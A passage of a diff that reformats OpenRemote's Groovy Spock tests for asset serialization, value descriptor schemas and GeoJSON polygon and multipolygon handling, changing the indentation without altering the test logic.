+    assetObjectNode.get("attributes").get("testAttribute").get("meta").get(MetaItemType.AGENT_LINK.name).get("type").asText() == HTTPAgentLink.class.getSimpleName()
 
-        when: "the asset is deserialized"
-        def asset2 = ValueUtil.parse(assetStr, LightAsset.class).orElse(null)
+    when: "the asset is deserialized"
+    def asset2 = ValueUtil.parse(assetStr, LightAsset.class).orElse(null)
 
-        then: "it should match the original"
-        asset.getName() == asset2.getName()
-        asset2.getType() == asset.getType()
-        asset2.getCreatedOn().toEpochMilli() == asset.getCreatedOn().toEpochMilli()
-        asset2.getParentId() == parentId
-        asset2.getPath() == asset.getPath()
-        asset2.getTemperature().orElse(null) == asset.getTemperature().orElse(null)
-        asset2.getColourRGB().map{it.getR()}.orElse(null) == asset.getColourRGB().map{it.getR()}.orElse(null)
-        asset2.getColourRGB().map{it.getG()}.orElse(null) == asset.getColourRGB().map{it.getG()}.orElse(null)
-        asset2.getColourRGB().map{it.getB()}.orElse(null) == asset.getColourRGB().map{it.getB()}.orElse(null)
-        asset2.getAttribute("testAttribute").flatMap{it.getMetaValue(MetaItemType.AGENT_LINK)}.orElse(null) instanceof HTTPAgentLink
-        asset2.getAttribute("testAttribute").flatMap{it.getMetaValue(MetaItemType.AGENT_LINK)}.map{(HTTPAgentLink)it}.flatMap{it.path}.orElse("") == "test_path"
-        asset2.getAttribute("testAttribute").flatMap{it.getMetaValue(MetaItemType.AGENT_LINK)}.map{(HTTPAgentLink)it}.flatMap{it.pagingMode}.orElse(false)
+    then: "it should match the original"
+    asset.getName() == asset2.getName()
+    asset2.getType() == asset.getType()
+    asset2.getCreatedOn().toEpochMilli() == asset.getCreatedOn().toEpochMilli()
+    asset2.getParentId() == parentId
+    asset2.getPath() == asset.getPath()
+    asset2.getTemperature().orElse(null) == asset.getTemperature().orElse(null)
+    asset2.getColourRGB().map{
+      it.getR()
+    }.orElse(null) == asset.getColourRGB().map{
+      it.getR()
+    }.orElse(null)
+    asset2.getColourRGB().map{
+      it.getG()
+    }.orElse(null) == asset.getColourRGB().map{
+      it.getG()
+    }.orElse(null)
+    asset2.getColourRGB().map{
+      it.getB()
+    }.orElse(null) == asset.getColourRGB().map{
+      it.getB()
+    }.orElse(null)
+    asset2.getAttribute("testAttribute").flatMap{
+      it.getMetaValue(MetaItemType.AGENT_LINK)
+    }.orElse(null) instanceof HTTPAgentLink
+    asset2.getAttribute("testAttribute").flatMap{
+      it.getMetaValue(MetaItemType.AGENT_LINK)
+    }.map{
+      (HTTPAgentLink)it
+    }.flatMap{
+      it.path
+    }.orElse("") == "test_path"
+    asset2.getAttribute("testAttribute").flatMap{
+      it.getMetaValue(MetaItemType.AGENT_LINK)
+    }.map{
+      (HTTPAgentLink)it
+    }.flatMap{
+      it.pagingMode
+    }.orElse(false)
 
-        when: "an attribute is cloned"
-        def attribute = asset2.getAttribute(LightAsset.COLOUR_RGB).get()
-        def clonedAttribute = ValueUtil.clone(attribute)
+    when: "an attribute is cloned"
+    def attribute = asset2.getAttribute(LightAsset.COLOUR_RGB).get()
+    def clonedAttribute = ValueUtil.clone(attribute)
 
-        then: "the cloned attribute should match the source"
-        clonedAttribute.getName() == attribute.getName()
-        clonedAttribute.getValue().orElse(null) == attribute.getValue().orElse(null)
-        clonedAttribute.getMeta() == attribute.getMeta()
+    then: "the cloned attribute should match the source"
+    clonedAttribute.getName() == attribute.getName()
+    clonedAttribute.getValue().orElse(null) == attribute.getValue().orElse(null)
+    clonedAttribute.getMeta() == attribute.getMeta()
 
-        when: "an attribute event is serialized"
-        def attributeEvent = new AttributeEvent(asset2, attribute, "Test", attribute.getValue().orElse(null), attribute.getTimestamp().orElse(0L), null, 0L).setDeleted(true)
-        def attributeEventStr = ValueUtil.asJSON(attributeEvent).orElse(null)
+    when: "an attribute event is serialized"
+    def attributeEvent = new AttributeEvent(asset2, attribute, "Test", attribute.getValue().orElse(null), attribute.getTimestamp().orElse(0L), null, 0L).setDeleted(true)
+    def attributeEventStr = ValueUtil.asJSON(attributeEvent).orElse(null)
 
-        then: "it should look as expected"
-        def attributeEventObjectNode = ValueUtil.parse(attributeEventStr, ObjectNode.class).get()
-        attributeEventObjectNode.get("ref").get("id").asText() == asset2.id
-        attributeEventObjectNode.get("ref").get("name").asText() == LightAsset.COLOUR_RGB.name
-        attributeEventObjectNode.get("timestamp").asLong() == createdDate.toEpochMilli()
-        attributeEventObjectNode.has("realm")
-        attributeEventObjectNode.get("value").isTextual()
-        attributeEventObjectNode.get("value").asText() == "#3264C8"
-        attributeEventObjectNode.get("deleted").asBoolean()
-        !attributeEventObjectNode.has("source")
-        !attributeEventObjectNode.has("meta")
+    then: "it should look as expected"
+    def attributeEventObjectNode = ValueUtil.parse(attributeEventStr, ObjectNode.class).get()
+    attributeEventObjectNode.get("ref").get("id").asText() == asset2.id
+    attributeEventObjectNode.get("ref").get("name").asText() == LightAsset.COLOUR_RGB.name
+    attributeEventObjectNode.get("timestamp").asLong() == createdDate.toEpochMilli()
+    attributeEventObjectNode.has("realm")
+    attributeEventObjectNode.get("value").isTextual()
+    attributeEventObjectNode.get("value").asText() == "#3264C8"
+    attributeEventObjectNode.get("deleted").asBoolean()
+    !attributeEventObjectNode.has("source")
+    !attributeEventObjectNode.has("meta")
 
-        when: "the attribute event is serialized with the enhanced view"
-        def attributeEventStr2 = ValueUtil.JSON.writerWithView(AttributeEvent.Enhanced.class).writeValueAsString(attributeEvent)
+    when: "the attribute event is serialized with the enhanced view"
+    def attributeEventStr2 = ValueUtil.JSON.writerWithView(AttributeEvent.Enhanced.class).writeValueAsString(attributeEvent)
 
-        then: "it should look as expected"
-        def attributeEventObjectNode2 = ValueUtil.parse(attributeEventStr2, ObjectNode.class).get()
-        attributeEventObjectNode2.get("ref").get("id").asText() == asset2.id
-        attributeEventObjectNode2.get("ref").get("name").asText() == LightAsset.COLOUR_RGB.name
-        attributeEventObjectNode2.get("timestamp").asLong() == createdDate.toEpochMilli()
-        attributeEventObjectNode2.has("realm")
-        attributeEventObjectNode2.get("value").isTextual()
-        attributeEventObjectNode2.get("value").asText() == "#3264C8"
-        attributeEventObjectNode2.get("deleted").asBoolean()
-        !attributeEventObjectNode2.has("source")
-        !attributeEventObjectNode2.has("meta")
+    then: "it should look as expected"
+    def attributeEventObjectNode2 = ValueUtil.parse(attributeEventStr2, ObjectNode.class).get()
+    attributeEventObjectNode2.get("ref").get("id").asText() == asset2.id
+    attributeEventObjectNode2.get("ref").get("name").asText() == LightAsset.COLOUR_RGB.name
+    attributeEventObjectNode2.get("timestamp").asLong() == createdDate.toEpochMilli()
+    attributeEventObjectNode2.has("realm")
+    attributeEventObjectNode2.get("value").isTextual()
+    attributeEventObjectNode2.get("value").asText() == "#3264C8"
+    attributeEventObjectNode2.get("deleted").asBoolean()
+    !attributeEventObjectNode2.has("source")
+    !attributeEventObjectNode2.has("meta")
+  }
+
+  @Unroll
+  def "Get valueDescriptor schema and hash for #name"(String name, Class<?> clazz, String hash) {
+    given: "required services are setup"
+    def assetModelService = container.getService(AssetModelService.class)
+
+    when: "we ask to generate a schema for #clazz"
+    def result = assetModelService.getValueDescriptorSchema(name)
+    def expected = ValueUtil.getSchema(clazz).toString()
+
+    then: "the schema to be the same"
+    Objects.equals(result.schema(), expected)
+
+    and: "the hash to be the same"
+    if (!hash.empty) {
+      Objects.equals(result.hash(), hash)
     }
 
-    @Unroll
-    def "Get valueDescriptor schema and hash for #name"(String name, Class<?> clazz, String hash) {
-        given: "required services are setup"
-        def assetModelService = container.getService(AssetModelService.class)
+    where:
+    name | clazz | hash
+    "text" | String | "04818E8A57A9EBA38CA5457DA1907FEF"
+    "text[]" | String[] | "A843B49121780A9A4DCA0FB5604CDA1B"
+    "text[][]" | String[][] | "2FD46740DD360941363BDA6D7F2D9EF2"
+    "agentLink" | AgentLink | "" // These are likely to change
+    "attributeLink" | AttributeLink | "" // so we skip them.
+    "valueConstraint[]" | ValueConstraint[] | ""
+    "forecastConfiguration" | ForecastConfiguration | ""
+    "valueFormat" | ValueFormat | ""
+  }
 
-        when: "we ask to generate a schema for #clazz"
-        def result = assetModelService.getValueDescriptorSchema(name)
-        def expected = ValueUtil.getSchema(clazz).toString()
+  def "Get unknown valueDescriptor schema"() {
+    given: "required services are setup"
+    def assetModelService = container.getService(AssetModelService.class)
 
-        then: "the schema to be the same"
-        Objects.equals(result.schema(), expected)
+    when: "we ask to generate a schema for a nonexistent value descriptor"
+    def schema = assetModelService.getValueDescriptorSchema("String")
 
-        and: "the hash to be the same"
-        if (!hash.empty) {
-            Objects.equals(result.hash(), hash)
-        }
-
-        where:
-        name                    | clazz                 | hash
-        "text"                  | String                | "04818E8A57A9EBA38CA5457DA1907FEF"
-        "text[]"                | String[]              | "A843B49121780A9A4DCA0FB5604CDA1B"
-        "text[][]"              | String[][]            | "2FD46740DD360941363BDA6D7F2D9EF2"
-        "agentLink"             | AgentLink             | "" // These are likely to change
-        "attributeLink"         | AttributeLink         | "" // so we skip them.
-        "valueConstraint[]"     | ValueConstraint[]     | ""
-        "forecastConfiguration" | ForecastConfiguration | ""
-        "valueFormat"           | ValueFormat           | ""
-    }
-
-    def "Get unknown valueDescriptor schema"() {
-        given: "required services are setup"
-        def assetModelService = container.getService(AssetModelService.class)
-
-        when: "we ask to generate a schema for a nonexistent value descriptor"
-        def schema = assetModelService.getValueDescriptorSchema("String")
-
-        then: "to return null"
-        Objects.equals(schema, null)
-    }
+    then: "to return null"
+    Objects.equals(schema, null)
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/model/GeoJSONPolygonTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/model/GeoJSONPolygonTest.groovy
@@ -26,355 +26,357 @@ import spock.lang.Specification
 
 class GeoJSONPolygonTest extends Specification {
 
-    def "Simple polygon serialization and deserialization"() {
-        given: "A simple rectangular polygon"
-        def exteriorRing = [
-            new Coordinate(16.2, 48.1),
-            new Coordinate(16.6, 48.1),
-            new Coordinate(16.6, 48.3),
-            new Coordinate(16.2, 48.3),
-            new Coordinate(16.2, 48.1)
-        ] as Coordinate[]
+  def "Simple polygon serialization and deserialization"() {
+    given: "A simple rectangular polygon"
+    def exteriorRing = [
+      new Coordinate(16.2, 48.1),
+      new Coordinate(16.6, 48.1),
+      new Coordinate(16.6, 48.3),
+      new Coordinate(16.2, 48.3),
+      new Coordinate(16.2, 48.1)
+    ] as Coordinate[]
 
-        when: "Creating a GeoJSONPolygon"
-        def polygon = new GeoJSONPolygon(exteriorRing)
+    when: "Creating a GeoJSONPolygon"
+    def polygon = new GeoJSONPolygon(exteriorRing)
 
-        then: "It should be properly initialized"
-        assert polygon.getCoordinates().size() == 1
-        assert polygon.getExteriorRing().length == 5
-        assert !polygon.hasHoles()
+    then: "It should be properly initialized"
+    assert polygon.getCoordinates().size() == 1
+    assert polygon.getExteriorRing().length == 5
+    assert !polygon.hasHoles()
 
-        when: "Serializing to JSON"
-        def json = ValueUtil.asJSON(polygon).orElse(null)
+    when: "Serializing to JSON"
+    def json = ValueUtil.asJSON(polygon).orElse(null)
 
-        then: "JSON should be properly formatted"
-        assert json != null
-        def node = ValueUtil.JSON.readTree(json)
-        assert node.get("type").asText() == "Polygon"
-        assert node.has("coordinates")
+    then: "JSON should be properly formatted"
+    assert json != null
+    def node = ValueUtil.JSON.readTree(json)
+    assert node.get("type").asText() == "Polygon"
+    assert node.has("coordinates")
 
-        when: "Deserializing from JSON"
-        def deserialized = ValueUtil.parse(json, GeoJSONPolygon.class).orElse(null)
+    when: "Deserializing from JSON"
+    def deserialized = ValueUtil.parse(json, GeoJSONPolygon.class).orElse(null)
 
-        then: "Should get the same polygon"
-        assert deserialized != null
-        assert deserialized.getCoordinates().size() == 1
-        assert deserialized.getExteriorRing().length == 5
-    }
+    then: "Should get the same polygon"
+    assert deserialized != null
+    assert deserialized.getCoordinates().size() == 1
+    assert deserialized.getExteriorRing().length == 5
+  }
 
-    def "Polygon with hole"() {
-        given: "A polygon with a hole (donut shape)"
-        def exteriorRing = [
-            new Coordinate(16.2, 48.1),
-            new Coordinate(16.6, 48.1),
-            new Coordinate(16.6, 48.3),
-            new Coordinate(16.2, 48.3),
-            new Coordinate(16.2, 48.1)
-        ] as Coordinate[]
+  def "Polygon with hole"() {
+    given: "A polygon with a hole (donut shape)"
+    def exteriorRing = [
+      new Coordinate(16.2, 48.1),
+      new Coordinate(16.6, 48.1),
+      new Coordinate(16.6, 48.3),
+      new Coordinate(16.2, 48.3),
+      new Coordinate(16.2, 48.1)
+    ] as Coordinate[]
 
-        def hole = [
-            new Coordinate(16.3, 48.15),
-            new Coordinate(16.5, 48.15),
-            new Coordinate(16.5, 48.25),
-            new Coordinate(16.3, 48.25),
-            new Coordinate(16.3, 48.15)
-        ] as Coordinate[]
+    def hole = [
+      new Coordinate(16.3, 48.15),
+      new Coordinate(16.5, 48.15),
+      new Coordinate(16.5, 48.25),
+      new Coordinate(16.3, 48.25),
+      new Coordinate(16.3, 48.15)
+    ] as Coordinate[]
 
-        when: "Creating a polygon with a hole"
-        def polygon = new GeoJSONPolygon(exteriorRing, [hole] as Coordinate[][])
+    when: "Creating a polygon with a hole"
+    def polygon = new GeoJSONPolygon(exteriorRing, [hole] as Coordinate[][])
 
-        then: "It should have both rings"
-        assert polygon.getCoordinates().size() == 2
-        assert polygon.hasHoles()
-        assert polygon.getHoles().size() == 1
-        assert polygon.getExteriorRing().length == 5
+    then: "It should have both rings"
+    assert polygon.getCoordinates().size() == 2
+    assert polygon.hasHoles()
+    assert polygon.getHoles().size() == 1
+    assert polygon.getExteriorRing().length == 5
 
-        when: "Serializing and deserializing"
-        def json = ValueUtil.asJSON(polygon).orElse(null)
-        def deserialized = ValueUtil.parse(json, GeoJSONPolygon.class).orElse(null)
+    when: "Serializing and deserializing"
+    def json = ValueUtil.asJSON(polygon).orElse(null)
+    def deserialized = ValueUtil.parse(json, GeoJSONPolygon.class).orElse(null)
 
-        then: "Should preserve the structure"
-        assert deserialized != null
-        assert deserialized.getCoordinates().size() == 2
-        assert deserialized.hasHoles()
-        assert deserialized.getHoles().size() == 1
-    }
+    then: "Should preserve the structure"
+    assert deserialized != null
+    assert deserialized.getCoordinates().size() == 2
+    assert deserialized.hasHoles()
+    assert deserialized.getHoles().size() == 1
+  }
 
-    def "Polygon from double array constructor"() {
-        given: "Raw coordinate data as double arrays"
-        def coordinates = [
-            [
-                [16.2d, 48.1d],
-                [16.6d, 48.1d],
-                [16.6d, 48.3d],
-                [16.2d, 48.3d],
-                [16.2d, 48.1d]
-            ]
-        ] as double[][][]
+  def "Polygon from double array constructor"() {
+    given: "Raw coordinate data as double arrays"
+    def coordinates = [
+      [
+        [16.2d, 48.1d],
+        [16.6d, 48.1d],
+        [16.6d, 48.3d],
+        [16.2d, 48.3d],
+        [16.2d, 48.1d]
+      ]
+    ] as double[][][]
 
-        when: "Creating polygon from raw data"
-        def polygon = new GeoJSONPolygon(coordinates)
+    when: "Creating polygon from raw data"
+    def polygon = new GeoJSONPolygon(coordinates)
 
-        then: "Should be properly initialized"
-        assert polygon.getCoordinates().size() == 1
-        assert polygon.getExteriorRing().length == 5
-        assert !polygon.hasHoles()
-    }
+    then: "Should be properly initialized"
+    assert polygon.getCoordinates().size() == 1
+    assert polygon.getExteriorRing().length == 5
+    assert !polygon.hasHoles()
+  }
 
-    def "Polygon coordinate clamping"() {
-        given: "Coordinates with out-of-bounds values"
-        def exteriorRing = [
-            new Coordinate(-200.0, -100.0),  // Out of bounds
-            new Coordinate(200.0, 100.0),     // Out of bounds
-            new Coordinate(16.6, 48.3),
-            new Coordinate(16.2, 48.3),
-            new Coordinate(-200.0, -100.0)
-        ] as Coordinate[]
+  def "Polygon coordinate clamping"() {
+    given: "Coordinates with out-of-bounds values"
+    def exteriorRing = [
+      new Coordinate(-200.0, -100.0),
+      // Out of bounds
+      new Coordinate(200.0, 100.0),
+      // Out of bounds
+      new Coordinate(16.6, 48.3),
+      new Coordinate(16.2, 48.3),
+      new Coordinate(-200.0, -100.0)
+    ] as Coordinate[]
 
-        when: "Creating polygon"
-        def polygon = new GeoJSONPolygon(exteriorRing)
+    when: "Creating polygon"
+    def polygon = new GeoJSONPolygon(exteriorRing)
 
-        then: "Coordinates should be clamped"
-        def ring = polygon.getExteriorRing()
-        assert ring[0].x == -180.0d
-        assert ring[0].y == -90.0d
-        assert ring[1].x == 180.0d
-        assert ring[1].y == 90.0d
-    }
+    then: "Coordinates should be clamped"
+    def ring = polygon.getExteriorRing()
+    assert ring[0].x == -180.0d
+    assert ring[0].y == -90.0d
+    assert ring[1].x == 180.0d
+    assert ring[1].y == 90.0d
+  }
 
-    def "Polygon validation errors"() {
-        when: "Creating polygon with too few coordinates"
-        GeoJSONPolygon ignored1 = new GeoJSONPolygon([
-            new Coordinate(16.2, 48.1),
-            new Coordinate(16.6, 48.1),
-            new Coordinate(16.2, 48.1)
-        ] as Coordinate[])
+  def "Polygon validation errors"() {
+    when: "Creating polygon with too few coordinates"
+    GeoJSONPolygon ignored1 = new GeoJSONPolygon([
+      new Coordinate(16.2, 48.1),
+      new Coordinate(16.6, 48.1),
+      new Coordinate(16.2, 48.1)
+    ] as Coordinate[])
 
-        then: "Should throw exception"
-        def ex1 = thrown(IllegalArgumentException)
-        assert ex1 != null
+    then: "Should throw exception"
+    def ex1 = thrown(IllegalArgumentException)
+    assert ex1 != null
 
-        when: "Creating polygon from empty array"
-        GeoJSONPolygon ignored2 = new GeoJSONPolygon(new double[0][][])
+    when: "Creating polygon from empty array"
+    GeoJSONPolygon ignored2 = new GeoJSONPolygon(new double[0][][])
 
-        then: "Should throw exception"
-        def ex2 = thrown(IllegalArgumentException)
-        assert ex2 != null
-    }
+    then: "Should throw exception"
+    def ex2 = thrown(IllegalArgumentException)
+    assert ex2 != null
+  }
 
-    def "Polygon with 3D coordinates"() {
-        given: "Coordinates with elevation"
-        def exteriorRing = [
-            new Coordinate(16.2, 48.1, 200.0),
-            new Coordinate(16.6, 48.1, 250.0),
-            new Coordinate(16.6, 48.3, 300.0),
-            new Coordinate(16.2, 48.3, 250.0),
-            new Coordinate(16.2, 48.1, 200.0)
-        ] as Coordinate[]
+  def "Polygon with 3D coordinates"() {
+    given: "Coordinates with elevation"
+    def exteriorRing = [
+      new Coordinate(16.2, 48.1, 200.0),
+      new Coordinate(16.6, 48.1, 250.0),
+      new Coordinate(16.6, 48.3, 300.0),
+      new Coordinate(16.2, 48.3, 250.0),
+      new Coordinate(16.2, 48.1, 200.0)
+    ] as Coordinate[]
 
-        when: "Creating and serializing polygon"
-        def polygon = new GeoJSONPolygon(exteriorRing)
-        def json = ValueUtil.asJSON(polygon).orElse(null)
+    when: "Creating and serializing polygon"
+    def polygon = new GeoJSONPolygon(exteriorRing)
+    def json = ValueUtil.asJSON(polygon).orElse(null)
 
-        then: "Should include Z coordinates in JSON"
-        assert json != null
-        assert json.contains("200")
-        assert json.contains("250")
-        assert json.contains("300")
+    then: "Should include Z coordinates in JSON"
+    assert json != null
+    assert json.contains("200")
+    assert json.contains("250")
+    assert json.contains("300")
 
-        when: "Deserializing"
-        def deserialized = ValueUtil.parse(json, GeoJSONPolygon.class).orElse(null)
+    when: "Deserializing"
+    def deserialized = ValueUtil.parse(json, GeoJSONPolygon.class).orElse(null)
 
-        then: "Should preserve Z coordinates"
-        assert deserialized != null
-        assert deserialized.getExteriorRing()[0].getZ() == 200.0d
-        assert deserialized.getExteriorRing()[1].getZ() == 250.0d
-    }
+    then: "Should preserve Z coordinates"
+    assert deserialized != null
+    assert deserialized.getExteriorRing()[0].getZ() == 200.0d
+    assert deserialized.getExteriorRing()[1].getZ() == 250.0d
+  }
 }
 
 class GeoJSONMultiPolygonTest extends Specification {
 
-    def "Simple MultiPolygon serialization"() {
-        given: "Two separate polygons"
-        def polygon1 = [
-            new Coordinate(16.2, 48.1),
-            new Coordinate(16.4, 48.1),
-            new Coordinate(16.4, 48.2),
-            new Coordinate(16.2, 48.2),
-            new Coordinate(16.2, 48.1)
-        ] as Coordinate[]
+  def "Simple MultiPolygon serialization"() {
+    given: "Two separate polygons"
+    def polygon1 = [
+      new Coordinate(16.2, 48.1),
+      new Coordinate(16.4, 48.1),
+      new Coordinate(16.4, 48.2),
+      new Coordinate(16.2, 48.2),
+      new Coordinate(16.2, 48.1)
+    ] as Coordinate[]
 
-        def polygon2 = [
-            new Coordinate(16.5, 48.1),
-            new Coordinate(16.7, 48.1),
-            new Coordinate(16.7, 48.2),
-            new Coordinate(16.5, 48.2),
-            new Coordinate(16.5, 48.1)
-        ] as Coordinate[]
+    def polygon2 = [
+      new Coordinate(16.5, 48.1),
+      new Coordinate(16.7, 48.1),
+      new Coordinate(16.7, 48.2),
+      new Coordinate(16.5, 48.2),
+      new Coordinate(16.5, 48.1)
+    ] as Coordinate[]
 
-        when: "Creating MultiPolygon"
-        def multiPolygon = new GeoJSONMultiPolygon([polygon1, polygon2])
+    when: "Creating MultiPolygon"
+    def multiPolygon = new GeoJSONMultiPolygon([polygon1, polygon2])
 
-        then: "Should have two polygons"
-        assert multiPolygon.getPolygonCount() == 2
-        assert multiPolygon.getCoordinates().size() == 2
+    then: "Should have two polygons"
+    assert multiPolygon.getPolygonCount() == 2
+    assert multiPolygon.getCoordinates().size() == 2
 
-        when: "Serializing to JSON"
-        def json = ValueUtil.asJSON(multiPolygon).orElse(null)
+    when: "Serializing to JSON"
+    def json = ValueUtil.asJSON(multiPolygon).orElse(null)
 
-        then: "JSON should be properly formatted"
-        assert json != null
-        def node = ValueUtil.JSON.readTree(json)
-        assert node.get("type").asText() == "MultiPolygon"
-        assert node.has("coordinates")
+    then: "JSON should be properly formatted"
+    assert json != null
+    def node = ValueUtil.JSON.readTree(json)
+    assert node.get("type").asText() == "MultiPolygon"
+    assert node.has("coordinates")
 
-        when: "Deserializing"
-        def deserialized = ValueUtil.parse(json, GeoJSONMultiPolygon.class).orElse(null)
+    when: "Deserializing"
+    def deserialized = ValueUtil.parse(json, GeoJSONMultiPolygon.class).orElse(null)
 
-        then: "Should preserve structure"
-        assert deserialized != null
-        assert deserialized.getPolygonCount() == 2
-    }
+    then: "Should preserve structure"
+    assert deserialized != null
+    assert deserialized.getPolygonCount() == 2
+  }
 
-    def "MultiPolygon from GeoJSONPolygon objects"() {
-        given: "Two GeoJSONPolygon objects"
-        def exteriorRing1 = [
-            new Coordinate(16.2, 48.1),
-            new Coordinate(16.4, 48.1),
-            new Coordinate(16.4, 48.2),
-            new Coordinate(16.2, 48.2),
-            new Coordinate(16.2, 48.1)
-        ] as Coordinate[]
+  def "MultiPolygon from GeoJSONPolygon objects"() {
+    given: "Two GeoJSONPolygon objects"
+    def exteriorRing1 = [
+      new Coordinate(16.2, 48.1),
+      new Coordinate(16.4, 48.1),
+      new Coordinate(16.4, 48.2),
+      new Coordinate(16.2, 48.2),
+      new Coordinate(16.2, 48.1)
+    ] as Coordinate[]
 
-        def exteriorRing2 = [
-            new Coordinate(16.5, 48.1),
-            new Coordinate(16.7, 48.1),
-            new Coordinate(16.7, 48.2),
-            new Coordinate(16.5, 48.2),
-            new Coordinate(16.5, 48.1)
-        ] as Coordinate[]
+    def exteriorRing2 = [
+      new Coordinate(16.5, 48.1),
+      new Coordinate(16.7, 48.1),
+      new Coordinate(16.7, 48.2),
+      new Coordinate(16.5, 48.2),
+      new Coordinate(16.5, 48.1)
+    ] as Coordinate[]
 
-        def polygon1 = new GeoJSONPolygon(exteriorRing1)
-        def polygon2 = new GeoJSONPolygon(exteriorRing2)
+    def polygon1 = new GeoJSONPolygon(exteriorRing1)
+    def polygon2 = new GeoJSONPolygon(exteriorRing2)
 
-        when: "Creating MultiPolygon from polygons"
-        def multiPolygon = new GeoJSONMultiPolygon(polygon1, polygon2)
+    when: "Creating MultiPolygon from polygons"
+    def multiPolygon = new GeoJSONMultiPolygon(polygon1, polygon2)
 
-        then: "Should have two polygons"
-        assert multiPolygon.getPolygonCount() == 2
-        assert multiPolygon.getPolygons().size() == 2
-    }
+    then: "Should have two polygons"
+    assert multiPolygon.getPolygonCount() == 2
+    assert multiPolygon.getPolygons().size() == 2
+  }
 
-    def "MultiPolygon with polygons with holes"() {
-        given: "A polygon with a hole"
-        def exteriorRing = [
-            new Coordinate(16.2, 48.1),
-            new Coordinate(16.6, 48.1),
-            new Coordinate(16.6, 48.3),
-            new Coordinate(16.2, 48.3),
-            new Coordinate(16.2, 48.1)
-        ] as Coordinate[]
+  def "MultiPolygon with polygons with holes"() {
+    given: "A polygon with a hole"
+    def exteriorRing = [
+      new Coordinate(16.2, 48.1),
+      new Coordinate(16.6, 48.1),
+      new Coordinate(16.6, 48.3),
+      new Coordinate(16.2, 48.3),
+      new Coordinate(16.2, 48.1)
+    ] as Coordinate[]
 
-        def hole = [
-            new Coordinate(16.3, 48.15),
-            new Coordinate(16.5, 48.15),
-            new Coordinate(16.5, 48.25),
-            new Coordinate(16.3, 48.25),
-            new Coordinate(16.3, 48.15)
-        ] as Coordinate[]
+    def hole = [
+      new Coordinate(16.3, 48.15),
+      new Coordinate(16.5, 48.15),
+      new Coordinate(16.5, 48.25),
+      new Coordinate(16.3, 48.25),
+      new Coordinate(16.3, 48.15)
+    ] as Coordinate[]
 
-        def polygon = new GeoJSONPolygon(exteriorRing, [hole] as Coordinate[][])
+    def polygon = new GeoJSONPolygon(exteriorRing, [hole] as Coordinate[][])
 
-        when: "Creating MultiPolygon with complex polygon"
-        def multiPolygon = new GeoJSONMultiPolygon(polygon)
+    when: "Creating MultiPolygon with complex polygon"
+    def multiPolygon = new GeoJSONMultiPolygon(polygon)
 
-        then: "Should preserve polygon structure"
-        assert multiPolygon.getPolygonCount() == 1
-        assert multiPolygon.getPolygon(0).size() == 2  // exterior + hole
+    then: "Should preserve polygon structure"
+    assert multiPolygon.getPolygonCount() == 1
+    assert multiPolygon.getPolygon(0).size() == 2 // exterior + hole
 
-        when: "Converting back to polygons"
-        def polygons = multiPolygon.getPolygons()
+    when: "Converting back to polygons"
+    def polygons = multiPolygon.getPolygons()
 
-        then: "Should preserve holes"
-        assert polygons.size() == 1
-        assert polygons[0].hasHoles()
-    }
+    then: "Should preserve holes"
+    assert polygons.size() == 1
+    assert polygons[0].hasHoles()
+  }
 
-    def "MultiPolygon from raw double arrays"() {
-        given: "Raw coordinate data"
-        def coordinates = [
-            [
-                [
-                    [16.2d, 48.1d],
-                    [16.4d, 48.1d],
-                    [16.4d, 48.2d],
-                    [16.2d, 48.2d],
-                    [16.2d, 48.1d]
-                ]
-            ],
-            [
-                [
-                    [16.5d, 48.1d],
-                    [16.7d, 48.1d],
-                    [16.7d, 48.2d],
-                    [16.5d, 48.2d],
-                    [16.5d, 48.1d]
-                ]
-            ]
-        ] as double[][][][]
+  def "MultiPolygon from raw double arrays"() {
+    given: "Raw coordinate data"
+    def coordinates = [
+      [
+        [
+          [16.2d, 48.1d],
+          [16.4d, 48.1d],
+          [16.4d, 48.2d],
+          [16.2d, 48.2d],
+          [16.2d, 48.1d]
+        ]
+      ],
+      [
+        [
+          [16.5d, 48.1d],
+          [16.7d, 48.1d],
+          [16.7d, 48.2d],
+          [16.5d, 48.2d],
+          [16.5d, 48.1d]
+        ]
+      ]
+    ] as double[][][][]
 
-        when: "Creating MultiPolygon"
-        def multiPolygon = new GeoJSONMultiPolygon(coordinates)
+    when: "Creating MultiPolygon"
+    def multiPolygon = new GeoJSONMultiPolygon(coordinates)
 
-        then: "Should be properly initialized"
-        assert multiPolygon.getPolygonCount() == 2
-    }
+    then: "Should be properly initialized"
+    assert multiPolygon.getPolygonCount() == 2
+  }
 
-    def "MultiPolygon validation errors"() {
-        when: "Creating empty MultiPolygon"
-        GeoJSONMultiPolygon ignored1 = new GeoJSONMultiPolygon(new double[0][][][])
+  def "MultiPolygon validation errors"() {
+    when: "Creating empty MultiPolygon"
+    GeoJSONMultiPolygon ignored1 = new GeoJSONMultiPolygon(new double[0][][][])
 
-        then: "Should throw exception"
-        def ex1 = thrown(IllegalArgumentException)
-        assert ex1 != null
+    then: "Should throw exception"
+    def ex1 = thrown(IllegalArgumentException)
+    assert ex1 != null
 
-        when: "Creating MultiPolygon with invalid polygon"
-        GeoJSONMultiPolygon ignored2 = new GeoJSONMultiPolygon([
-            [
-                new Coordinate(16.2, 48.1),
-                new Coordinate(16.4, 48.1),
-                new Coordinate(16.2, 48.1)  // Only 3 coordinates
-            ] as Coordinate[]
-        ])
+    when: "Creating MultiPolygon with invalid polygon"
+    GeoJSONMultiPolygon ignored2 = new GeoJSONMultiPolygon([
+      [
+        new Coordinate(16.2, 48.1),
+        new Coordinate(16.4, 48.1),
+        new Coordinate(16.2, 48.1) // Only 3 coordinates
+      ] as Coordinate[]
+    ])
 
-        then: "Should throw exception"
-        def ex2 = thrown(IllegalArgumentException)
-        assert ex2 != null
-    }
+    then: "Should throw exception"
+    def ex2 = thrown(IllegalArgumentException)
+    assert ex2 != null
+  }
 
-    def "MultiPolygon getPolygon bounds checking"() {
-        given: "A MultiPolygon with 2 polygons"
-        def polygon1 = [
-            new Coordinate(16.2, 48.1),
-            new Coordinate(16.4, 48.1),
-            new Coordinate(16.4, 48.2),
-            new Coordinate(16.2, 48.2),
-            new Coordinate(16.2, 48.1)
-        ] as Coordinate[]
+  def "MultiPolygon getPolygon bounds checking"() {
+    given: "A MultiPolygon with 2 polygons"
+    def polygon1 = [
+      new Coordinate(16.2, 48.1),
+      new Coordinate(16.4, 48.1),
+      new Coordinate(16.4, 48.2),
+      new Coordinate(16.2, 48.2),
+      new Coordinate(16.2, 48.1)
+    ] as Coordinate[]
 
-        def multiPolygon = new GeoJSONMultiPolygon([polygon1])
+    def multiPolygon = new GeoJSONMultiPolygon([polygon1])
 
